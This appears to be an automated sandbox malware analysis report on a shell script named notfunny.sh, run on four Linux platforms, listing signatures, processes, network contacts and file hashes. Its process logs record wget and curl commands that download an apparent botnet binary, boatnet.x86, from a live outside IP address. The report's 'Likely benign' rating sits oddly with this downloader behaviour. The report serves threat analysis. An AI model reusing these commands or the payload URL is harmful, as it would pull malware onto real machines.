Malware Analysis Report

2025-04-03 19:34

Sample ID 241028-bnyepsxamh
Target notfunny.sh
SHA256 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Tags
upx antivm discovery
score
5/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
5/10

SHA256

9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

Threat Level: Likely benign

The file notfunny.sh was found to be: Likely benign.

Malicious Activity Summary

upx antivm discovery

UPX packed file

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

128s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 8833728bd41c20fb14e6075a9cdd8afc
SHA1 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256 ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA512 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48

/tmp/boatnet.x86

MD5 fae60c4eac7b4998f780c9e78baea871
SHA1 1e398be7855c3971eae39a1b860324b34483876c
SHA256 26044e5d1c95ad4518fce56f55f3b8163eeae768ec1ffc06ff0e26563a94c1e6
SHA512 cd51a9e0ecf5e306db58eac8ee5261f67bb3331aa78d2d2abea88bf0da23c28ef9e86fa843c3fe123b8545ea7934dc66f1c70436cd7f1147977382d2ee5afad5

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

127s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 8833728bd41c20fb14e6075a9cdd8afc
SHA1 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256 ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA512 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48

/tmp/boatnet.x86

MD5 12776fc203b937b6422e57bbbbcbf012
SHA1 d656e47cc7c9df12f563f9e10c35594dadb3e682
SHA256 a037afc2c98a4db8eecd784faacbfdc713c42ae1e8a6c804a6cc2ed7244b3623
SHA512 93a943182e6da55369f6a2fbeca918469eb726609584ca128d845d0d772efb34ed53069df7715bac1250f2dfa1cfdeb6f246edfcec7825414ca9d61d86e8ae34

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

28s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 54e076b42cc4c7bc77ed783c93733706
SHA1 60142c48cd534ab3069378d73a63c87627efb42b
SHA256 fbc7b2a7d16b78fc5360b2709692ae863466577e3fd0de5e4245cc2432d33a13
SHA512 cabea678a945078356c35a68a2cab192bbb6ceb1c47ca05e9f3b519be4832bdd8ab6d78226617cf5de4b4f19097dcb9ebf142c7259234bd2c6f6118c7adaaa2a

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

debian9-mipsel-20240611-en

Max time kernel

149s

Max time network

122s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 8833728bd41c20fb14e6075a9cdd8afc
SHA1 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256 ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA512 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48